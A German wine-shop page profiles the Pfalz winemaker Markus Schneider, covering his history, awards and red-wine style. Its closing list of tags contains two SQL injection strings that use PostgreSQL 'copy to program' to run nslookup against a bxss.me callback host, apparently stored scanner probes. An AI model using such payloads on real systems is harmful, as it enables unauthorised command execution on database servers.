Markus Schneider Weine – Pfalz Deutschland Weisswein Rotwein


1990 bot sich Klaus Schneider eine einmalige Chance: Er konnte für seinen Sohn Markus ein altes Weingut kaufen, denn Markus Schneider wollte nur eines werden: Winzer! 1991-1994 lernte er das Handwerk bei Dr. Bürklin-Wolf in Wachenheim und brachte 1994 den ersten Jahrgang der Schneider Weine auf den Markt.
Bereits 2003 wurde er zum „Newcomer“ vom Feinschmecker gekürt, 2006 feiert der Gault Millau   Markus Schneider als seine „Entdeckung des Jahres“, und der als „Junger Wilder“ gestartete Pfälzer hat Rotwein-Marken wie „Einzelstück“, „Black Print“ oder „Steinsatz“ etabliert.
Der Stil der Markus Schneider Weine gründet sich vor allem auf die Cuvèe-Vorbilder wie etwa die Bordelaiser Châteaux Lynch Bages und Ducru Beaucaillou. Markus Schneider kombiniert dabei die kühleren, höher gelegenen Terroirs in Richtung Haardtrand mit den eher wärmeren aus der Ebene rund um Ellerstadt: ein idealer Mix aus Finesse und Kraft!

  • testing
  • testing';copy (select '') to program 'nslookup dns.sqli.55065.73502-5108.73502.39f9e.1.bxss.me
  • testing';copy (select '') to program 'nslookup dns.sqli.55065.73502-9564.73502.5247b.1.bxss.me
  • Interview markus schneider wein